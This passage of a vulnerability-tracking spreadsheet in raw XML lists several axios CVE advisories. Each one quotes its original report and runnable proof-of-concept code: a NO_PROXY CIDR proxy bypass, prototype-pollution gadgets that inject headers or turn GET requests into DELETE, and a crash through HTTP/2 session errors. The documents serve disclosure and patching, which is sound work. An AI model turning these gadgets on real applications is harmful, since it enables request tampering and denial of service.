  console.log('');
  if (proxyHits &gt; 0 &amp;&amp; internalHits === 0) {
    console.log(`POC RESULT: axios sent the target through the proxy with NO_PROXY=${noProxy}.`);
  } else if (proxyHits === 0 &amp;&amp; internalHits &gt; 0) {
    console.log(`POC RESULT: axios bypassed the proxy with NO_PROXY=${noProxy}.`);
  } else {
    console.log('POC RESULT: mixed/ambiguous routing; inspect counts above.');
  }
} finally {
  delete process.env.http_proxy;
  delete process.env.HTTP_PROXY;
  delete process.env.no_proxy;
  delete process.env.NO_PROXY;
  await close(proxy);
  await close(internal);
}
```
Run the failing CIDR case:
```bash
POC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs
```
Observed:
```text
Axios NO_PROXY CIDR full axios network PoC
axios VERSION=1.17.0
NO_PROXY=127.0.0.0/8
HTTP_PROXY=http://127.0.0.1:34315
Target URL=http://127.0.0.1:43993/metadata
Response=proxy saw request for http://127.0.0.1:43993/metadata
Proxy hits=1
Internal direct hits=0
POC RESULT: axios sent the target through the proxy with NO_PROXY=127.0.0.0/8.
```
## Control
Axios does honor exact IP `NO_PROXY` entries:
```bash
POC_INTERNAL_HOST=127.0.0.1 POC_NO_PROXY=127.0.0.1 node poc-no-proxy-cidr-axios.mjs
```
Expected:
```text
NO_PROXY=127.0.0.1
Response=internal service saw /metadata
Proxy hits=0
Internal direct hits=1
POC RESULT: axios bypassed the proxy with NO_PROXY=127.0.0.1.
```
This shows the issue is not that `NO_PROXY` is ignored entirely. The bypass failure is specific to CIDR-form entries such as `127.0.0.0/8`.
## Impact
This is a proxy exclusion bypass caused by unsupported CIDR matching in `NO_PROXY`.
The impact is configuration-dependent. It affects Axios users in Node.js environments who rely on proxy environment variables and configure `NO_PROXY` using CIDR notation to exclude internal, loopback, private, Kubernetes, CI, or cloud metadata ranges.
Potentially impacted environments include:
- CI/CD runners with globally injected `HTTP_PROXY` / `HTTPS_PROXY`.
- Containers inheriting proxy variables from the host or orchestrator.
- Kubernetes workloads using `NO_PROXY` for cluster-internal service ranges.
- Enterprise networks using HTTP proxies with internal network exclusions.
- Cloud workloads relying on `NO_PROXY` to keep metadata or internal service requests off proxy infrastructure.
If a configured proxy is compromised, attacker-controlled, overly broad, or outside the intended trust boundary, requests that operators expected to stay direct may instead be exposed to that proxy. This may expose request URLs, internal hostnames, paths, headers, or credentials depending on application behavior.
This should not be characterized as arbitrary proxy injection by itself. The issue is that Axios silently fails to enforce common CIDR-form proxy exclusions, which can undermine proxy bypass policy and defense-in-depth assumptions.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101899</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101900</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M9" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr"/>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios contains a guard in the Node HTTP adapter to avoid using an inherited `Object.prototype.getHeaders` as a FormData header source. The fetch adapter calls the shared `resolveConfig()` helper before dispatch, and that helper lacks the same guard. If another vulnerability pollutes `Object.prototype` with FormData-like properties and `getHeaders()`, the fetch adapter can merge attacker-controlled headers into the outbound request.
Axios does not create the prototype pollution source. This is a read-side gadget in the fetch adapter configuration path.
## Impact
An attacker with a prior same-process prototype-pollution primitive can inject headers into fetch-adapter requests. Depending on the target service, this may affect authorization, metadata-service access, cache behavior, conditional request handling, or other application-specific header logic.
Plain objects are blocked by current FormData detection. The confirmed path uses arrays or non-plain class instances whose prototype chain can resolve polluted FormData-like properties.
## Affected Functionality
Affected:
- Fetch adapter requests.
- `resolveConfig()` handling of `utils.isFormData(data)`.
- Request bodies that can be spoofed as FormData through inherited `Symbol.toStringTag`, `append`, and `getHeaders`.
Not affected:
- Node HTTP adapter's later FormData header path, which checks `data.getHeaders !== Object.prototype.getHeaders`.
- Plain object request bodies rejected by current `isFormData()` plain-object guard.
- Processes without prototype pollution.
## Technical Details
`lib/helpers/resolveConfig.js` currently contains:
```js
if (utils.isFormData(data)) {
  if (platform.hasStandardBrowserEnv || platform.hasStandardBrowserWebWorkerEnv || utils.isReactNative(data)) {
    headers.setContentType(undefined);
  } else if (utils.isFunction(data.getHeaders)) {
    setFormDataHeaders(headers, data.getHeaders(), own('formDataHeaderPolicy'));
  }
}
```
Unlike `lib/adapters/http.js`, this code does not reject `Object.prototype.getHeaders`. Local verification on axios `1.18.1` polluted `Object.prototype[Symbol.toStringTag]`, `append`, and `getHeaders`, then sent an array body with `adapter: 'fetch'`. The loopback server received `X-Poisoned: yes`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype[Symbol.toStringTag] = 'FormData';
Object.prototype.append = function () {};
Object.prototype.getHeaders = () =&gt; ({ 'X-Poisoned': 'yes' });
await axios.post(url, ['a', 'b'], { adapter: 'fetch' });
```
Expected safe behavior is that inherited `Object.prototype.getHeaders` is ignored. Current affected behavior merges the returned header.
## Workarounds
Use the Node HTTP adapter for server-side requests that may run in a polluted process. Avoid passing array or class-instance bodies through the fetch adapter when prototype pollution is suspected.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
The Node HTTP adapter contains a guard that prevents `Object.prototype.getHeaders` from being used as a FormData header source. The shared `resolveConfig()` helper does not have the same guard. The fetch adapter calls `resolveConfig()`, so it can still merge headers returned by inherited `data.getHeaders()`.
This is a patch mismatch for the FormData prototype-pollution header-injection class.
## Affected Version
Validated on:
- axios: `1.17.0`
- commit: `4306df2`
- runtime: Node.js `v24.15.0`
## Preconditions
- Application uses `adapter: 'fetch'`.
- A separate prototype-pollution primitive can write:
  - `Object.prototype[Symbol.toStringTag] = 'FormData'`
  - `Object.prototype.append = function () {}`
  - `Object.prototype.getHeaders = function () { ... }`
- The request body is an array or custom class instance. Plain objects are blocked by the current `isFormData()` plain-object guard.
## Root Cause
`lib/adapters/http.js` contains:
```js
data.getHeaders !== Object.prototype.getHeaders
```
But `lib/helpers/resolveConfig.js` only checks:
```js
} else if (utils.isFunction(data.getHeaders)) {
  setFormDataHeaders(headers, data.getHeaders(), own('formDataHeaderPolicy'));
}
```
The fetch adapter calls `resolveConfig(config)` before dispatching the request.
## Impact
An attacker can inject arbitrary headers into fetch-adapter requests. This may be used to influence internal APIs, metadata services, cache behavior, or application-specific authorization checks.
## Proof of Concept
```js
import axios from './index.js';
import http from 'http';
const start = (handler) =&gt; new Promise((resolve) =&gt; {
  const server = http.createServer((req, res) =&gt; {
    let body = '';
    req.on('data', (chunk) =&gt; (body += chunk));
    req.on('end', () =&gt; handler(req, res, body));
  });
  server.listen(0, '127.0.0.1', () =&gt; resolve(server));
});
const stop = (server) =&gt; new Promise((resolve) =&gt; server.close(resolve));
const hits = [];
const tag = Symbol.toStringTag;
const server = await start((req, res, body) =&gt; {
  hits.push({ headers: req.headers, body });
  res.setHeader('Content-Type', 'application/json');
  res.end('{"ok":true}');
});
try {
  Object.prototype[tag] = 'FormData';
  Object.prototype.append = function () {};
  Object.prototype.getHeaders = () =&gt; {
    const headers = Object.create(null);
    headers['X-Poisoned'] = 'yes';
    return headers;
  };
  await axios.post(`http://127.0.0.1:${server.address().port}/fetch-formdata`, ['a', 'b'], {
    adapter: 'fetch',
    timeout: 3000
  });
  console.log(hits[0]);
} finally {
  delete Object.prototype[tag];
  delete Object.prototype.append;
  delete Object.prototype.getHeaders;
  await stop(server);
}
```
Observed wire request:
```json
{
  "headers": {
    "x-poisoned": "yes",
    "content-type": "text/plain;charset=UTF-8",
    "content-length": "3"
  },
  "body": "a,b"
}
```
## References
- https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9
- https://osv.dev/vulnerability/GHSA-6chq-wfr3-2hj9
- Related patch area: `lib/adapters/http.js`, `lib/helpers/resolveConfig.js`
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101900</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101901</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr"/>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios versions with Node.js HTTP/2 support can terminate the caller’s process when a ClientHttp2Session emits an error event that is not handled by axios.
This affects applications that use the Node HTTP adapter with httpVersion: 2. A malicious, unavailable, or non-HTTP/2 endpoint can cause an uncaught exception instead of a normal rejected axios request.
## Impact
The impact is denial of service. In affected applications, an attacker who can influence the request destination, or operate the destination server, may be able to crash the Node.js process.
This does not affect default HTTP/1.1 usage, browser XHR/fetch adapters, or applications that do not enable axios HTTP/2 support.
## Affected Functionality
Affected path:
- Node.js HTTP adapter
- httpVersion: 2
- HTTP/2 session creation/reuse through Http2Sessions
- Network/session failures emitted as ClientHttp2Session error events
Caller-controlled http2Options can make the issue easier to trigger, but passing arbitrary attacker input into axios config is caller-controlled behavior and should not be the primary advisory framing.
## Technical Details
Http2Sessions.getSession() creates a session with http2.connect(authority, options) but only registers a close handler. It does not register an error handler on the returned ClientHttp2Session.
When the session emits error, Node treats it as an unhandled EventEmitter error and throws. This can bypass the normal axios Promise rejection path and terminate the process.
## Proof of Concept of Attack
```js
import axios from './index.js';
await axios.get('http://127.0.0.1:1/', {
  httpVersion: 2,
  timeout: 1000
});
```
Expected vulnerable behavior: the process exits with an uncaught ECONNREFUSED session error instead of only rejecting the axios request.
## Workarounds
Disable axios HTTP/2 for untrusted or user-influenced destinations and use the default HTTP/1.1 adapter until a fixed release is available. Also avoid passing attacker-controlled values into http2Options; axios config is trusted application input.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
Hi, i'm RelunSec a security researcher working with **InsiteTech.jp**
i want let you known, i finded a DoS in axios, to reproduce that, that is the example of a server
```js
const http = require('http');
// Import the local axios version to ensure the patch is active
const axios = require('../../lib/axios.js').default; 
const url = require('url');
// A public HTTP/2 server to make internal requests to.
// This simulates an external service your application might interact with over HTTP/2.
const TARGET_URL = 'https://nghttp2.org/'; 
const PORT = 3000;
const server = http.createServer(async (req, res) =&gt; {
  const parsedUrl = url.parse(req.url, true);
  const http2optionId = parsedUrl.query.http2optionId;
  if (!http2optionId) {
  console.warn(`[SERVER] Rejected request: Missing http2optionId parameter`);
  res.writeHead(400, { 'Content-Type': 'text/plain' });
  res.end('Error: Missing http2optionId query parameter. Usage: ?http2optionId=value\n');
  return; 
}
  console.log(`[SERVER] Received request with http2optionId: ${http2optionId}`);
  // Create an Axios instance configured for HTTP/2
  // The 'id' in http2Options makes each session configuration unique.
  const axiosInstance = axios.create({
    baseURL: TARGET_URL,
    httpVersion: 2,
    http2Options: {
      // rejectUnauthorized: false, // Uncomment if targeting a local HTTP/2 server with self-signed cert
      id: http2optionId, // This is the attacker-controlled unique part
    },
    // Adding a short timeout to prevent attacker from waiting too long if target is slow
    timeout: 5000 
  });
  try {
    const response = await axiosInstance.get('/');
    res.writeHead(200, { 'Content-Type': 'text/plain' });
    res.end(`Internal HTTP/2 request successful for ID: ${http2optionId}\nStatus: ${response.status}`);
  } catch (error) {
    // Check for the specific error indicating session limit reached
    if (error.isAxiosError &amp;&amp; error.code === axios.AxiosError.ERR_BAD_OPTION_VALUE) {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
    } else {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}:`, error.message);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: Generic error - ${error.message}`);
    }
  }
});
server.listen(PORT, () =&gt; {
  console.log(`PoC Server listening on http://localhost:${PORT}`);
  console.log(`Targeting internal HTTP/2 requests to: ${TARGET_URL}`);
  console.log(`Send requests to http://localhost:${PORT}?http2optionId=...`);
  console.log(`Expected behavior with current patch: After ~100 unique http2optionIds, subsequent requests will receive ERR_BAD_OPTION_VALUE.`);
});
```
i tested all that in latest git version, after starting the server.cjs, to trigger that you just need do
```rust
relunsec@relunsec:~/software/axios-1/poc/poc$ curl http://127.0.0.1:3000/?http2optionId=hi
curl: (52) Empty reply from server
```
that is extremly simple to trigger
it confirms a DoS in the HTTP/2 session cache, that needs be patched, the impact is will lead the server crashes and shutdown by an attacker, the server is written properly and no flaws in it and try catch blocks and errors handled however because that is an axios internal error will crash
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101901</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101902</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M11" s="5" t="inlineStr">
        <is>
          <t>0.34.0, 1.20.0</t>
        </is>
      </c>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr"/>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios default-instance requests that omit an explicit method can read an inherited `method` value from `Object.prototype`. If another vulnerability in the same process pollutes `Object.prototype.method`, calls such as `axios.request({ url })` and `axios({ url })` can send a state-changing HTTP method instead of the expected default `GET`.
Axios does not create the prototype pollution source. This is a read-side gadget in axios request dispatch.
## Impact
In an affected application with a separate prototype-pollution primitive, an attacker can change axios default-instance requests that omit `method` from `GET` to methods such as `DELETE`, `POST`, `PUT`, or `PATCH`. The practical impact depends on the target endpoint and can include unintended writes, deletion, or other state changes.
Method aliases such as `axios.get(url)` and requests with an explicit own `method` are not affected by the confirmed method path.
## Affected Functionality
Affected:
- Default axios instance calls: `axios.request({ url })`.
- Callable shorthand: `axios({ url })`.
- Requests where no own `config.method` is provided.
Not affected in the confirmed method PoC:
- `axios.get(url)` and other method aliases.
- `axios.request({ url, method: 'GET' })`.
- `axios.create().request({ url })` when the created instance defaults are produced by current `mergeConfig()` and do not inherit from `Object.prototype`.
## Technical Details
`lib/core/Axios.js` sets the request method with:
```js
config.method = (config.method || this.defaults.method || 'get').toLowerCase();
```
`mergeConfig()` now returns a null-prototype request config, so `config.method` is safe from `Object.prototype`. However, the default axios instance stores the module defaults object as `this.defaults`, and that defaults object is a normal object. If `Object.prototype.method` exists, `this.defaults.method` resolves to the polluted inherited value.
Local verification on axios `1.18.1` showed a default-instance `axios.request({ url })` request reaching a loopback server as `DELETE` after `Object.prototype.method = 'DELETE'`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.method = 'DELETE';
try {
  await axios.request({ url: 'http://127.0.0.1:&lt;port&gt;/resource' });
} finally {
  delete Object.prototype.method;
}
```
Expected safe behavior is a `GET` request. Current affected behavior sends `DELETE` on the default instance when no method is provided.
## Workarounds
Use explicit method aliases such as `axios.get()` or set an own `method` on request configs. Avoid default-instance shorthand for requests in processes where prototype pollution is suspected or possible.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
Axios `1.17.0` contains a read-side prototype-pollution gadget in the default Axios instance. If another vulnerability in the same Node.js process pollutes `Object.prototype.method`, default-instance calls such as `axios.request({ url })` and `axios({ url })` can be forced to use an attacker-controlled HTTP method, such as `DELETE`, instead of the expected default `GET`.
Axios does not create the prototype pollution by itself. The issue is that Axios reads fallback values from `this.defaults` without an own-property guard, allowing inherited values from `Object.prototype` to influence request behavior.
This should be treated as a prototype-pollution gadget, not as a standalone prototype-pollution source. In other words, Axios is not the component that lets the attacker write to `Object.prototype`; Axios is the component that becomes dangerous after `Object.prototype` has already been polluted by another bug in the same process.
### Details
The vulnerable fallback read is in `lib/core/Axios.js`:
```js
// Set config.allowAbsoluteUrls
if (config.allowAbsoluteUrls !== undefined) {
  // do nothing
} else if (this.defaults.allowAbsoluteUrls !== undefined) {
  config.allowAbsoluteUrls = this.defaults.allowAbsoluteUrls;
} else {
  config.allowAbsoluteUrls = true;
}
// Set config.method
config.method = (config.method || this.defaults.method || 'get').toLowerCase();
```
The merged request `config` is created as a null-prototype object in `lib/core/mergeConfig.js`:
```js
const config = Object.create(null);
```
Therefore, when the caller does not provide `config.method`, the fallback becomes:
```js
this.defaults.method
```
The default Axios instance uses the module defaults object. In the tested version, that defaults object is affected by inherited properties from `Object.prototype`. If `Object.prototype.method` is polluted, `this.defaults.method` resolves to that inherited value and Axios uses it as the request method.
The same unsafe inherited-property pattern also affects `this.defaults.allowAbsoluteUrls`, which can change how absolute URLs are combined with `baseURL`.
### Proof of Concept
#### Access and Attack Conditions
No admin access is required for Axios itself. This is a library-level gadget.
The attacker must have an existing way to pollute `Object.prototype` in the same Node.js process, for example through a separate prototype-pollution vulnerability in another dependency or application input path. Axios is the gadget that turns that pollution into dangerous HTTP request behavior.
Required condition:
```text
Some other bug or unsafe merge path in the application must allow Object.prototype pollution.
```
What Axios contributes:
```text
Axios reads inherited Object.prototype.method through this.defaults.method and uses it as the HTTP method fallback.
```
What Axios does not do:
```text
Axios does not create Object.prototype pollution by itself.
```
Affected usage:
```js
axios.request({ url });
axios({ url });
```
Not affected in the confirmed PoC:
```js
axios.get(url);
axios.request({ url, method: "GET" });
axios.create().request({ url });
```
#### Reproduction Steps
1. Create a clean test directory and install Axios `1.17.0`:
```powershell
mkdir axios-validation
cd axios-validation
npm init -y
npm install axios@1.17.0 --no-audit --no-fund
```
2. Save the method override PoC below as:
```text
validate-prototype-method-gadget.mjs
```
3. Run the PoC:
```powershell
node validate-prototype-method-gadget.mjs
```
4. Confirm that the output shows:
```text
defaultRequestMethod=DELETE
defaultShorthandMethod=DELETE
getAliasMethod=GET
explicitGetMethod=GET
createdInstanceMethod=GET
RESULT: CONFIRMED
```
5. This proves that after `Object.prototype.method = "DELETE"`, default-instance calls that omit an explicit method are sent as `DELETE`.
#### What the Method PoC Script Does
The PoC starts a temporary local HTTP server for each Axios call and records the HTTP method received by that server. It then simulates an already-existing prototype-pollution condition by setting:
```js
Object.prototype.method = "DELETE";
```
While that pollution is active, the script sends five Axios requests:
```js
axios.request({ url });                 // expected vulnerable path
axios({ url });                         // expected vulnerable shorthand path
axios.get(url);                         // expected safe alias path
axios.request({ url, method: "GET" });  // expected safe explicit-method path
axios.create().request({ url });        // expected safe isolated-instance path
```
The script then deletes the polluted property:
```js
delete Object.prototype.method;
```
Finally, it prints the method observed by the local server for each request. The vulnerable behavior is confirmed when the default Axios instance sends `DELETE` for `axios.request({ url })` and `axios({ url })`, while the safe comparison paths still send `GET`.
#### Method Override PoC
Create `validate-prototype-method-gadget.mjs`:
```js
import http from "node:http";
import axios from "axios";
async function listen(server) {
  await new Promise((resolve) =&gt; server.listen(0, "127.0.0.1", resolve));
  return server.address().port;
}
async function runRequest(label, requestFn) {
  const hits = [];
  const server = http.createServer((req, res) =&gt; {
    hits.push({
      method: req.method,
      url: req.url,
    });
    res.writeHead(200, { "content-type": "application/json" });
    res.end(JSON.stringify({ ok: true }));
  });
  const port = await listen(server);
  const url = `http://127.0.0.1:${port}/${label}`;
  let status = "completed";
  let error = "";
  try {
    await requestFn(url);
  } catch (err) {
    status = "error";
    error = err?.message || String(err);
  }
  server.close();
  return { label, status, error, hits };
}
const results = [];
Object.prototype.method = "DELETE";
try {
  results.push(await runRequest("default-request-no-method", (url) =&gt; axios.request({ url })));
  results.push(await runRequest("default-shorthand-no-method", (url) =&gt; axios({ url })));
  results.push(await runRequest("default-get-alias", (url) =&gt; axios.get(url)));
  results.push(await runRequest("default-request-explicit-get", (url) =&gt; axios.request({ url, method: "GET" })));
  const instance = axios.create();
  results.push(await runRequest("created-instance-request-no-method", (url) =&gt; instance.request({ url })));
} finally {
  delete Object.prototype.method;
}
const defaultRequestMethod = results.find((r) =&gt; r.label === "default-request-no-method")?.hits[0]?.method || "";
const defaultShorthandMethod = results.find((r) =&gt; r.label === "default-shorthand-no-method")?.hits[0]?.method || "";
const getAliasMethod = results.find((r) =&gt; r.label === "default-get-alias")?.hits[0]?.method || "";
const explicitGetMethod = results.find((r) =&gt; r.label === "default-request-explicit-get")?.hits[0]?.method || "";
const createdInstanceMethod = results.find((r) =&gt; r.label === "created-instance-request-no-method")?.hits[0]?.method || "";
console.log(`axiosVersion=${axios.VERSION}`);
console.log(`results=${JSON.stringify(results)}`);
console.log(`defaultRequestMethod=${defaultRequestMethod}`);
console.log(`defaultShorthandMethod=${defaultShorthandMethod}`);
console.log(`getAliasMethod=${getAliasMethod}`);
console.log(`explicitGetMethod=${explicitGetMethod}`);
console.log(`createdInstanceMethod=${createdInstanceMethod}`);
const confirmed =
  defaultRequestMethod === "DELETE" &amp;&amp;
  defaultShorthandMethod === "DELETE" &amp;&amp;
  getAliasMethod === "GET" &amp;&amp;
  explicitGetMethod === "GET" &amp;&amp;
  createdInstanceMethod === "GET";
console.log(confirmed ? "RESULT: CONFIRMED" : "RESULT: NOT CONFIRMED");
process.exitCode = confirmed ? 0 : 1;
```
Run:
```powershell
node validate-prototype-method-gadget.mjs
```
Observed result:
```text
axiosVersion=1.17.0
defaultRequestMethod=DELETE
defaultShorthandMethod=DELETE
getAliasMethod=GET
explicitGetMethod=GET
createdInstanceMethod=GET
RESULT: CONFIRMED
```
The local server received:
```text
axios.request({ url })              -&gt; DELETE
axios({ url })                      -&gt; DELETE
axios.get(url)                      -&gt; GET
axios.request({ url, method:"GET" }) -&gt; GET
axios.create().request({ url })     -&gt; GET
```
This confirms that inherited `Object.prototype.method` controls the default method for vulnerable default-instance request paths.
#### Supporting `allowAbsoluteUrls` Gadget Evidence
The same inherited-property issue affects `allowAbsoluteUrls`.
Create `validate-prototype-allowabsoluteurls-gadget.mjs`:
```js
import http from "node:http";
import axios from "axios";
async function listen(server) {
  await new Promise((resolve) =&gt; server.listen(0, "127.0.0.1", resolve));
  return server.address().port;
}
async function runCase(label, requestFn) {
  const baseHits = [];
  const absoluteHits = [];
  const baseServer = http.createServer((req, res) =&gt; {
    baseHits.push({ method: req.method, url: req.url, host: req.headers.host || "" });
    res.end("base");
  });
  const absoluteServer = http.createServer((req, res) =&gt; {
    absoluteHits.push({ method: req.method, url: req.url, host: req.headers.host || "" });
    res.end("absolute");
  });
  const basePort = await listen(baseServer);
  const absolutePort = await listen(absoluteServer);
  try {
    await requestFn({
      baseURL: `http://127.0.0.1:${basePort}/api`,
      url: `http://127.0.0.1:${absolutePort}/absolute-path`,
    });
  } catch {}
  baseServer.close();
  absoluteServer.close();
  return { label, baseHits, absoluteHits };
}
const results = [];
results.push(await runCase("baseline-no-pollution", (config) =&gt; axios.request(config)));
Object.prototype.allowAbsoluteUrls = false;
try {
  results.push(await runCase("polluted-default-request", (config) =&gt; axios.request(config)));
  const instance = axios.create();
  results.push(await runCase("polluted-created-instance", (config) =&gt; instance.request(config)));
} finally {
  delete Object.prototype.allowAbsoluteUrls;
}
console.log(`axiosVersion=${axios.VERSION}`);
console.log(`results=${JSON.stringify(results)}`);
```
Observed result:
```text
axiosVersion=1.17.0
baselineUsedAbsolute=true
pollutedDefaultUsedBase=true
pollutedInstanceUsedAbsolute=true
RESULT: CONFIRMED
```
Without pollution, Axios sends the request to the absolute URL. After `Object.prototype.allowAbsoluteUrls = false`, the default Axios instance combines the absolute URL with `baseURL` and sends the request to the base server instead. An instance created with `axios.create()` remains unaffected.
### Impact
This is a prototype-pollution gadget. It becomes exploitable when an application has any separate prototype-pollution primitive that allows an attacker to set properties on `Object.prototype` in the same Node.js process.
If such pollution is possible, an attacker can influence Axios default-instance requests that omit an explicit method:
- `axios.request({ url })`
- `axios({ url })`
This can turn an expected safe default `GET` request into a state-changing method such as:
- `DELETE`
- `POST`
- `PUT`
- `PATCH`
Potential impact includes unauthorized state-changing requests, deletion of resources, unintended writes, data corruption, or denial of service when the target endpoint treats the HTTP method as security-relevant.
The issue does not require admin access to Axios itself, but it does require an existing prototype-pollution path in the application. Applications that always use explicit methods, method aliases such as `axios.get()`, or isolated instances created through `axios.create()` are not affected by the confirmed method-override path.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101902</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101903</t>
        </is>
      </c>
      <c r="D12" s="5" t="inlineStr"/>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M12" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr"/>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>## Summary
